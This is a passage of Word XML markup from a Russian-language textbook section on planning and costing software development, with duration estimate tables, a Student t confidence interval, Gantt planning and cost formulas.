          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=35,5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Значение Т, подсчитанное по формуле (1), в которую вместо a</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставлены T</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, будет равно 35,5. Дисперсия s</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, рассчитанная по (2), равна 4,9; s= 2,2136.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задав вероятность ошибки Р</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>ош</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0,05, по таблицам распределения Стьюдента определим величину t : число степеней свободы равно 9; t = 2,262. По формуле (3) получаем D = 1,583. Таким образом, с вероятностью 0,95 оцениваемая величина T находится в интервале [33,917; 37,083].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Результаты первых трех этапов представляются в пояснительной записке в виде таблицы. В табл. 3.5 и 3.6 приведены примеры упорядоченных последовательностей действий с оценками их длительности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 5</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Упорядоченная последовательность действий и оценка их длительности при разработке информационно-справочной системы, дн.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4178"/>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="756"/>
        <w:gridCol w:w="421"/>
        <w:gridCol w:w="656"/>
        <w:gridCol w:w="636"/>
      </w:tblGrid>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Действия</w:t>
            </w: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A</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w: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M</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w: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B</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w: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MO</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>I</w:t>
            </w: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D</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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1.Анализ технического задания</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1,3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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2.Библиографический анализ</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0,3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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3.Экономический анализ</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0,7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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4.Построение инфологической модели</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r>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5.Концептуальный проект</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1,7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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6.Разработка интерфейса системы</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2,5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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7.Тестирование и отладка</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1,0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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8.Документирование</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1,3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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Итого:</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151,5</w:t>
            </w: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eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>4,24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E73975" w:rsidRPr="00617AC0" w:rsidRDefault="00E73975" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 6</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Упорядоченная последовательность действий и оценка их длительности для разработки программного комплекса генерации изображений, дн.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="6672"/>
        <w:gridCol w:w="434"/>
        <w:gridCol w:w="474"/>
        <w:gridCol w:w="421"/>
        <w:gridCol w:w="656"/>
        <w:gridCol w:w="516"/>
      </w:tblGrid>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Действия</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A</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</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M</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</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B</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</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MO</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>I</w:t>
            </w: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D</w:t>
            </w:r>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>i</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1.Разработка технического задания</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0,7</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2.Уточнение технического задания, выбор программной среды</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0,7</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lastRenderedPageBreak/>
              <w:t>3.Изучение технической документации</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0,7</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4.Разработка алгоритмов вывода изображений</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0,7</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5.Оптимизация и отладка алгоритмов</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0,7</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6.Реализация проекта</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0,7</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7.Тестирование и отладка</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1,7</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8.Согласование и встраивание</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0,7</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9.Документирование</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0,7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidTr="00BE7B15">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Итого:</w:t>
            </w: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rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00BE7B15" w:rsidRPr="00617AC0" w:rsidRDefault="00BE7B15" w:rsidP="002E7230">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>2,6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>На третьем этапе по данным результирующих таблиц определяются требуемые затраты труда программиста в человеко-днях. Если продолжительность разработки не превышает лимит времени, выделенного на проект, то можно переходить к подготовке плана, Если превышает, то – к рассмотрению другого варианта разработки ПО с измененными ресурсами. Таким образом, планирование может потребовать итерационных действий.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">На четвертом этапе план представляется в виде диаграммы Ганта (рис.1). Начало первого действия может быть </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>привязано</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> к календарной дате. На диаграмме выделены действия, выполняемые с использованием ЭВМ, что позволяет определить общие затраты машинных ресурсов.</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Если разработка ПО осуществляется в составе группы, выполняющей общий проект, то время начала и окончания индивидуальных действий увязывается с общим планом разработки. В этом случае может использоваться сетевое планирование, применение которого на практике существенно упрощается за счет имеющихся стандартных программ, например </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSPROGECT</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Действия</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- действия, выполняемые без использования ЭВМ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- действия, выполняемые с использованием ЭВМ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчет себестоимости проводится для определения рыночной цены ПО и инвестиционных затрат. Рыночная цена основывается на плановой себестоимости. Инвестиционные затраты принимаются равными плановой себестоимости.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Плановая себестоимость определяется по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С = (З + А + С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>пр.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)(1+К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где:</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>З - заработная плата разработчика с начислениями на социальные нужды</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>А - амортизация ПЭВМ и другого оборудования,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>С</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>пр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - прочие производственные затраты,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>К</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - коэффициент накладных затрат (обычно, 0,2),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При определенной выше длительности разработки и коэффициента t</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> начислений на социальные нужды 0,395 заработная плата составит</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1294740" cy="381990"/>
            <wp:effectExtent l="19050" t="0" r="660" b="0"/>
            <wp:docPr id="27257" name="Рисунок 386" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image012.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId458" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1294635" cy="381959"/>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где:</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m - среднее количество дней в месяц, m = 22;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>З</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>- среднемесячная заработная плата разработчика.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Амортизационные отчисления при линейном методе расчета амортизации составят</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1032150" cy="358856"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="27256" name="Рисунок 387" descr="http://ok-t.ru/studopedia/baza14/71156389034.files/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descr="http://ok-t.ru/studopedia/baza14/71156389034.files/image013.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId459" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1031672" cy="358690"/>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где:</w:t>
      </w:r>
      <w:r w:rsidR="00BE7B15" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Н</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>А</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - годовая норма амортизации,;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C1EEC" w:rsidRPr="00617AC0" w:rsidRDefault="006C1EEC" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ц</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>ВТ</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
